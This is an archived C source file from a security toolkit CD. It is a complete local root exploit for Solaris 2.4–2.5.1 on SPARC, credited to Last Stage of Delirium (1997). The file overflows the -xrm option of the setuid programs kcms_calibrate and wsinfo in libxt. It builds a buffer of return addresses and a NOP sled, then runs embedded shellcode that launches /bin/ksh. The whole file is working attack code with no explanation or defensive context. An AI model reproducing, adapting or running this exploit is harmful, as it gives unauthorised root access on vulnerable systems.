home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / libxt.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  2KB  |  62 lines

---

1. /*## copyright LAST STAGE OF DELIRIUM sep 1997 poland        *://lsd-pl.net/ #*/
2. /*## libxt.so -xrm                                                           #*/
3.  
4. #define NOPNUM 3000
5. #define ADRNUM 3000
6. #define PCHNUM 3000
7. #define TMPNUM 3000
8.  
9. char shellcode[]=
10.     "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>        */
11.     "\x20\xbf\xff\xff"     /* bn,a    <shellcode>          */
12.     "\x7f\xff\xff\xff"     /* call    <shellcode+4>        */
13.     "\x90\x03\xe0\x20"     /* add     %o7,32,%o0           */
14.     "\x92\x02\x20\x10"     /* add     %o0,16,%o1           */
15.     "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]          */
16.     "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]         */
17.     "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]         */
18.     "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */
19.     "\x91\xd0\x20\x08"     /* ta      8                    */
20.     "/bin/ksh"
21. ;
22.  
23. char jump[]=
24.     "\x81\xc3\xe0\x08"     /* jmp     %o7+8                */
25.     "\x90\x10\x00\x0e"     /* mov     %sp,%o0              */
26. ;
27.  
28. static char nop[]="\x80\x1c\x40\x11";
29.  
30. main(int argc,char **argv){
31.     char buffer[15000],adr[4],pch[4],tmp[4],*b;
32.     int i,n=-1;
33.  
34.     printf("copyright LAST STAGE OF DELIRIUM sep 1997 poland  //lsd-pl.net/\n");
35.     printf("libxt.so -xrm for solaris 2.4 2.5 2.5.1 sparc\n\n");
36.  
37.     if(argc==1){
38.         printf("usage: %s {kcms_calibrate|wsinfo}\n",argv[0]);
39.         exit(-1);
40.     }
41.     if(!strcmp(argv[1],"kcms_calibrate")) n=0;
42.     if(!strcmp(argv[1],"wsinfo")) n=1;
43.     if(n==-1) exit(-1);
44.  
45.     *((unsigned long*)adr)=(*(unsigned long(*)())jump)()-116+1500+3000+6000;
46.     *((unsigned long*)pch)=(*(unsigned long(*)())jump)()-116+1500+3000;
47.     *((unsigned long*)tmp)=(*(unsigned long(*)())jump)()-116+1500+3000+3000;
48.  
49.     b=buffer;
50.     for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
51.     for(i=0;i<TMPNUM;i++) *b++=tmp[i%4];
52.     for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
53.     for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
54.     for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
55.     *b=0;
56.  
57.     switch(n){
58.     case 0: execle("/usr/openwin/bin/kcms_calibrate","lsd","-xrm",buffer,0,0);
59.     case 1: execle("/usr/openwin/bin/wsinfo","lsd","-xrm",buffer,0,0);
60.     }
61. }
62. /*                    www.hack.co.za           [3 August 2000]*/